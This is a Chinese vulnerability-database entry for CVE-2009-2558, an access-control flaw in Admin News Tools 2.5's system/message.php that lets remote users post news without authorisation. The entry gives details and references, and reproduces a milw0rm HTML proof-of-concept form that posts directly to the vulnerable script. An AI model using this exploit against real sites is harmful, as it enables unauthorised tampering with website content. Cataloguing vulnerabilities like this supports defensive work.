Admin News Tools system/message.php权限许可和访问控制漏洞

漏洞ID	1118113	漏洞类型	权限许可和访问控制
发布时间	2009-07-15	更新时间	2009-07-15
CVE编号	CVE-2009-2558	CNNVD-ID	CNNVD-200907-309
漏洞平台	PHP	CVSS评分	7.5

|漏洞来源

https://www.exploit-db.com/exploits/9161
https://www.securityfocus.com/bid/43554
https://cxsecurity.com/issue/WLB-2009070167
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200907-309

|漏洞详情

AdminNewsTools2.5版本的system/message.php中存在权限许可和访问控制漏洞。由于不严格的访问权限，远程攻击者借路径请求发布新闻消息。

|漏洞EXP

<html>
<!-- Securitylab.ir , info@securitylab.ir -->
<head>
</head>
<body>
<center>
<center>
<p><b><font size="+2">Admin News Tools<i> </i></font><font size="2">Remote
Contents Change Vulnerability</font></b></p>
</center>
<form action="http://site.com/news/system/message.php" method="post">
  <div><br>
  <textarea cols="89" rows="12" name="message"></textarea>
  <p>
  <input value="Send"
 onclick="this.setAttribute('value','...');"
 type="submit"></p>
  </div>
  <p>Just for Fun
  </p>
  <p></p>
</form>
</center>
</body>
</html>

# milw0rm.com [2009-07-15]

|受影响的产品

Admin News Tools Admin News Tools 2.5

|参考资料

来源:XF
名称:adminnewstools-message-sec-bypass(51780)
链接:http://xforce.iss.net/xforce/xfdb/51780
来源:MILW0RM
名称:9161
链接:http://www.milw0rm.com/exploits/9161
来源:SECUNIA
名称:35842
链接:http://secunia.com/advisories/35842